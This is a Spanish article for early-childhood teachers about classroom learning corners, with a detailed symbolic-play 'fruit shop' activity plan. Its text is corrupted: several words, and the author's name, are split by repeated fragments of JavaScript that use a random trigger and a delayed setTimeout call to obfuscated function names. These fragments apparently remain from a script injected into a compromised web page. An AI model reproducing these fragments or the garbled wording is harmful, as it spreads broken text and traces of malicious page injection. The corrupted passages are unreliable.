EL RINCÓN DEL JUEGO SIMBÓLICO EN LA EDUCACIÓN INFANTIL

Autora: Mª Fernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda Rodríguez Rodríguez

          Los rincones nos permiten organizar el aula en pequeños grupos, cada uno de los cuales realiza una tarea determinada y diferente, que pueden ser de trabajo o de juego. Según el tipo de actividad, algunos rincones necesitan ser dirigidos por el maestro; pero, en otros, los niños pueden funcionar con bastante autonomía.

          Organizados en grupos reducidos, los niños aprenden a trabajar en equipo, a colaborar y a compartir conocimientos y también se potencia su iniciativa y el sentido de la responsabilidad.

           Los maestros planificamos las actividades de manera que cada niño vaya pasandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a lo largo de un período de tiempo (semana, quincena…) por todos los diferentes rincones de trabajo. Es positivo que haya más de un maestro en el aula, de modo que, cada uno, se encargue de atender unos rincones concretos.

          Trabajar por rincones nos permite dedicar una atención más individualizada a cada niño/a, planificandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando actividades de aprendizaje adaptadas a sus conocimientos previos y nos aporta una serie de ventajas:


-        Aprenden a través del JUEGO.

-        Se educa en la COLECTIVIDAD: todo es de todos, material y espacio.

-        Favorecen los procesos de SOCIALIZACIÓN: cooperar, repartir tareas…

-        Favorecen el APRENDIZAJE con los demás.

-        Fomentan la AUTONOMÍA.

-        Favorecen HÁBITOS DE ORDEN Y RESPETO a las normas de funcionamiento

-        Estimulan la INVESTIGACIÓN, la CREATIVIDAD, la CURIOSIDAD y la IMAGINACIÓN.

-        Se respeta su INDIVIDUALIDAD.

-        Les pone en contacto con distintos ROLES Y MODELOS de actuación en el medio social.

 RINCONES DE APRENDIZAJE MÁS COMUNES:

          Entre los rincones de aprendizaje más comunes está el rincón de construcción, dramatización, arte, música, ciencias, biblioteca, juegos tranquilos, actividades psicomotrices, lenguaje, juego simbólico…

           En este artículo vamos a hacer hincapié en el rincón del juego simbólico, por su importancia en el desarrollo del niño. En el juego simbólico el niño representa, mental y mímicamente, una realidad que plasma según su deseo y necesidad. Permite al niño expresar sus sentimientos.


-        Objetivos:

  • Desarrollar la capacidad de asumir roles de adultos.
  • Aprender a jugar y trabajar colectivamente siendo flexibles y respetandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las reglas del juego.
  • Favorecer la creatividad y la imaginación, además de la seguridad en sí mismo.
  • Desarrollar la expresión del juego simbólico, viviendo a la vez fantasía y realidad.
  • Aprender a resolver pequeños conflictos que aparecen.

 

-        Materiales:

  • Frutos del otoño, papel, lápices, rotuladores…

 

-        Actividades:

  • Para motivar a nuestros alumnos, partiremos de los conocimientos y experiencias que tienen. Para ello, realizaré una asamblea donde estableceré una conversación sobre los frutos típicos de la época otoñal. En dicha asamblea plantearé una serie de preguntas:

-          ¿Qué es una frutería?

-          ¿Qué se vende?

-          ¿Con qué se paga?

-          ¿Qué productos nos podemos encontrar? ¿Cuáles son los característicos de la época otoñal?

-          ¿Qué personas hay? ¿Qué hacen allí?

-          ¿Cómo están colocados los productos?

-          …

  • Después, compraremos productos de la época otoñal para el rincón de nuestra aula “la frutería”: nueces, castañas, naranjas, higos, pasas,…
  • Entre todos, estableceremos las normas de utilización de la frutería, lo que da lugar a amplios debates sobre hábitos alimenticios, problemas digestivos y normas de higiene.
  • Para completar nuestra frutería le diremos a nuestros alumnos que traigan frutas de casa.
  • Cada mañana, en la asamblea, se presentan, a los demás, los frutos traídos de casa y se analiza su color, tamaño, forma, textura, olor…
  • Clasificamos los productos según diferentes criterios (por el olor, la textura…) y los colocamos en nuestra frutería.
  • Les ponemos etiquetas con los precios en euros (es una buena ocasión para su tratamiento).
  • Ponemos letreros en cada una de las clasificaciones realizadas, indicandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el nombre de cada una de ellas. (Esta actividad posibilita tratamientos diversos sobre el lenguaje escrito: escribir nombres, ver cuántas palmadas tiene el nombre, adivinar qué letras están en los nombre del alumnado).
  • Nombramos los productos de las distintas secciones o clasificaciones.
  • Buscamos en los frutos palabras cortas y palabras largas y contamos las letras.
  • Observamos las letras repetidas en esos nombres, si las hay.
  • Buscamos en frutos distintos la misma letra.
  • Hacemos listas de frutas, según diferentes criterios.
  • Inventamos diálogos aparentandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando que estamos en una frutería con nuestros compañeros, en donde uno será el comprador y otro el vendedor. Quien haga de vendedor tendrá que dar publicidad a sus productos.
  • Contamos el número de frutos que hay en cada sección. (Esta actividad nos permite contenidos matemáticos).
  • Observamos los precios en euros.
  • Vemos si el dinero que llevan es bastante, falta, o sobra para comprar lo que se pretende.
  • Calculamos lo que falta y lo que sobra.
  • Pesamos frutos en la balanza.
  • Colocamos frutos en distinta posición y decimos si están arriba/abajo, cerca/lejos.
  • Escribimos el nombre y el precio de algunos frutos en la pizarra.
  • Escogemos una fruta, decimos todo los que sabemos de ella y la dibujamos.
  • Dramatizamos conductas cívicas que tenemos que adoptar en una frutería.
  • Identificamos sonidos: moneda que cae al suelo, papel que envuelve, bolsa…
  • Aprendemos una canción que dice: “para crecer, hay que comer; sino comemos, no crecemos”.

 

   VALORACIÓN DE LA EXPERIENCIA

          La experiencia en el aula resultó muy positiva. Los alumnos se mostraron muy motivados con el hecho de visitar una frutería y después realizar la nuestra en el aula.

Bibliografía

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.